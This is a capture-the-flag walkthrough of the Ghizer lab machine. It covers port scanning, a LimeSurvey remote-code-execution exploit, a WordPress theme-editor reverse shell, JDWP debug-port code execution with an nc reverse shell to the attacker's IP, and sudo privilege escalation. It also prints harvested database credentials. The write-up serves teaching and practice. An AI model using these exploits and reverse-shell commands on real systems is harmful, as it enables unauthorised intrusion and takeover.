thm-ghizer-public

Nmap

Let’s start by running a port scan on the host using nmap.
The output of the scan can be seen below:

1
2
3
4
5
6
7
8
9
nmap -v -sS -sV 10.10.40.50

Nmap scan report for 10.10.40.50
Host is up (0.088s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp?
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))

Port 21 (ftp)

There is not Anonymous authentication for this FTP service.

Port 80 (http)

LimeSurvey is an advanced online survey system to create online surveys.

 

Port 443 (https)

Here we can find a WordPress site with a note that the default /wp-login was hidden.

 

Directory Brute-Forcing

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
gobuster dir -e -u http://10.10.40.50 -w /usr/share/wordlists/dirb/common.txt -x txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.40.50
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2021/04/05 07:39:01 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.40.50/.hta                 (Status: 403) [Size: 276]
http://10.10.40.50/.hta.txt             (Status: 403) [Size: 276]
http://10.10.40.50/.htaccess            (Status: 403) [Size: 276]
http://10.10.40.50/.htpasswd.txt        (Status: 403) [Size: 276]
http://10.10.40.50/.htaccess.txt        (Status: 403) [Size: 276]
http://10.10.40.50/.htpasswd            (Status: 403) [Size: 276]
http://10.10.40.50/admin                (Status: 301) [Size: 310] [--> http://10.10.40.50/admin/]
http://10.10.40.50/application          (Status: 301) [Size: 316] [--> http://10.10.40.50/application/]
http://10.10.40.50/assets               (Status: 301) [Size: 311] [--> http://10.10.40.50/assets/]     
http://10.10.40.50/docs                 (Status: 301) [Size: 309] [--> http://10.10.40.50/docs/]       
http://10.10.40.50/framework            (Status: 301) [Size: 314] [--> http://10.10.40.50/framework/]  
http://10.10.40.50/index.php            (Status: 200) [Size: 40931]                                    
http://10.10.40.50/installer            (Status: 301) [Size: 314] [--> http://10.10.40.50/installer/]  
http://10.10.40.50/locale               (Status: 301) [Size: 311] [--> http://10.10.40.50/locale/]     
http://10.10.40.50/plugins              (Status: 301) [Size: 312] [--> http://10.10.40.50/plugins/]    
http://10.10.40.50/server-status        (Status: 403) [Size: 276]                                      
http://10.10.40.50/tests                (Status: 301) [Size: 310] [--> http://10.10.40.50/tests/]      
http://10.10.40.50/themes               (Status: 301) [Size: 311] [--> http://10.10.40.50/themes/]     
http://10.10.40.50/tmp                  (Status: 301) [Size: 308] [--> http://10.10.40.50/tmp/]        
http://10.10.40.50/upload               (Status: 301) [Size: 311] [--> http://10.10.40.50/upload/]     

Navigating to the found /admin resource we have a login portal.

 

Using the default LimeSurvey credentials admin:password, we can successfully log in.

 

Current running LimeSurvey version is 3.15.9.


LimeSurvey Exploitation

Using searchsploit, we will find that there is a RCE for LimeSurvey versions < 3.16.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
searchsploit limesurvey
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
LimeSurvey (PHPSurveyor 1.91+ stable) - Blind SQL Injection                        | php/webapps/18508.txt
LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion                           | php/webapps/4156.txt
LimeSurvey 1.52 - 'language.php' Remote File Inclusion                             | php/webapps/4544.txt
LimeSurvey 1.85+ - 'admin.php' Cross-Site Scripting                                | php/webapps/35787.txt
LimeSurvey 1.92+ build120620 - Multiple Vulnerabilities                            | php/webapps/19330.txt
LimeSurvey 2.00+ (build 131107) - Multiple Vulnerabilities                         | php/webapps/29789.txt
LimeSurvey 3.17.13 - Cross-Site Scripting                                          | php/webapps/47386.txt
LimeSurvey 4.1.11 - 'File Manager' Path Traversal                                  | php/webapps/48297.txt
LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting             | php/webapps/48523.txt
LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting                | php/webapps/48289.txt
LimeSurvey 4.3.10 - 'Survey Menu' Persistent Cross-Site Scripting                  | php/webapps/48762.txt
LimeSurvey < 3.16 - Remote Code Execution                                          | php/webapps/46634.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Gaining Access

This exploit can be find on the Exploit-DB. The point of this exploitation is that the vulnerable versions are affected to a serialization attack via the “phar://” wrapper.

Providing found default credentials and running the exploit will give us a shell as a user www-data.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
python 46634.py http://10.10.40.50 admin password
[*] Logging in to LimeSurvey...
[*] Creating a new Survey...
[+] SurveyID: 231443
[*] Uploading a malicious PHAR...
[*] Sending the Payload...
[*] TCPDF Response: <strong>TCPDF ERROR: </strong>[Image] Unable to get the size of the image: phar://./upload/surveys/231443/files/malicious.jpg
[+] Pwned! :)
[+] Getting the shell...
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Performing a basic manual enumeration, we will find a config.php for LimeSurvey.

1
2
3
4
5
6
7
$ find / -type f -name "config.php" 2>/dev/null
/var/www/html/wordpress/wp-content/plugins/akismet/views/config.php
/var/www/html/limesurvey/framework/messages/config.php
/var/www/html/limesurvey/application/config/config.php
/var/www/html/limesurvey/third_party/kcfinder/conf/config.php

cat /var/www/html/limesurvey/application/config/config.php

This file includes credentials for a user called Anny.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
. . .
return array(
	'components' => array(
		'db' => array(
			'connectionString' => 'mysql:host=localhost;port=3306;dbname=limedb;',
			'emulatePrepare' => true,
			'username' => 'Anny',
			'password' => 'P4$W0RD!!#S3CUr3!',
			'charset' => 'utf8mb4',
			'tablePrefix' => 'lime_',
		),
. . .

WordPress Exploitaion

 

In the Meta section, we can see Log In label which will redirects us to the hidden login portal ?devtools . There we can use found credentials to log in as Anny.

Gaining Access

From the previous experiences exploiting WordPress, we know that we can get a reverse shell through the page editor.

We will navigate to Appearance -> Editor. Then we will choose /archive.php and change its content to php reverse shell
After editing IP address and desired port, we will press the Update file button.

Before visiting updated php file, don’t forget to start a listener on your local machine.
Then we will navigate to
http://10.10.40.50/wp-content/themes/{themename}/archive.php
and successfully gain access as a www-data user.


Lateral Movement

Performing a basic manual system enumeration, we will find that beside other services there is one running on port 18001. This is a JDWP debug port used by Ghidra when launching in the debug mode opened to all interfaces.

Ghidra is a Java-based reverse engineering framework that features a graphical user interface (GUI) and has been designed to run on a variety of platforms including Windows, macOS, and Linux. (more)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
$ netstat -tulnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:18001         0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::34051                :::*                    LISTEN      -               
tcp6       0      0 :::37805                :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::18002                :::*                    LISTEN      -               
tcp6       0      0 ::1:631                 :::*                    LISTEN      -               
tcp6       0      0 :::443                  :::*                    LISTEN      -               
tcp6       0      0 :::443                  :::*                    LISTEN      -               
tcp6       0      0 :::443                  :::*                    LISTEN      -               
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           -               
udp        0      0 0.0.0.0:33149           0.0.0.0:*                           -               
udp        0      0 0.0.0.0:631             0.0.0.0:*                           -               
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               
udp6       0      0 :::5353                 :::*                                -               
udp6       0      0 :::58160                :::*                                -               

It is possible to perform RCE Through JDWP Debug Port. We will proceed according to the PoC video. The main point is to set a breakpoint on a class with run() method. Then when the breakpoint is hit, we will execute java reverse shell.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
www-data@ubuntu:/$ jdb -attach 127.0.0.1:18001
jdb -attach 127.0.0.1:18001
Set uncaught java.lang.Throwable
Set deferred uncaught java.lang.Throwable
Initializing jdb ...
> classpath
classpath
base directory: /home/veronica
classpath: [/home/veronica/ghidra_9.0/support/../Ghidra/Framework/Utility/lib/Utility.jar]
> classes
. . .
> stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run()
> 
Breakpoint hit: "thread=Log4j2-TF-4-Scheduled-1", org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run(), line=96 bci=0

Log4j2-TF-4-Scheduled-1[1] print new java.lang.Runtime().exec(“nc -e 10.9.140.180 8888 /bin/sh”)

On the output below, we can see that we received a shell as a user veronica.

1
2
3
4
5
6
7
8
9
nc -lnvp 8888
listening on [any] 8888 ...
connect to [10.9.140.180] from (UNKNOWN) [10.10.98.112] 55378
id
uid=1000(veronica) gid=1000(veronica) groups=1000(veronica),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
python -c 'import pty;pty.spawn("/bin/bash")';
veronica@ubuntu:~$ wc user.txt
wc user.txt
 1  1 70 user.txt

Privilege Escalation

By issuing sudo -l, we can see which commands we can execute as root and some other important information.

1
2
3
4
5
6
7
8
9
veronica@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for veronica on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User veronica may run the following commands on ubuntu:
    (ALL : ALL) ALL
    (root : root) NOPASSWD: /usr/bin/python3.5 /home/veronica/base.py

Based on the output above, we can ran base.py as a user root.
We will delete this file and create a python script with the same name and one liner to spawn a bash shell as a user root.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
veronica@ubuntu:~$ ls -la
ls -la
total 152
drwxr-xr-x 22 veronica veronica 4096 Apr  5 07:05 .
drwxr-xr-x  3 root     root     4096 Jul 23  2020 ..
-rw-r--r--  1 root     root       86 Jul 23  2020 base.py
. . .
veronica@ubuntu:~$ rm -rf /home/veronica/base.py
veronica@ubuntu:~$ echo 'import pty;pty.spawn("/bin/bash")' > base.py
veronica@ubuntu:~$ sudo /usr/bin/python3.5 /home/veronica/base.py
sudo /usr/bin/python3.5 /home/veronica/base.py
root@ubuntu:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~# wc /root/root.txt
wc /root/root.txt
 1  1 70 /root/root.txt

Thanks to the fact that NOPASSWD is set for this command, we are able to successfully execute our base.py and get a root shell.

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *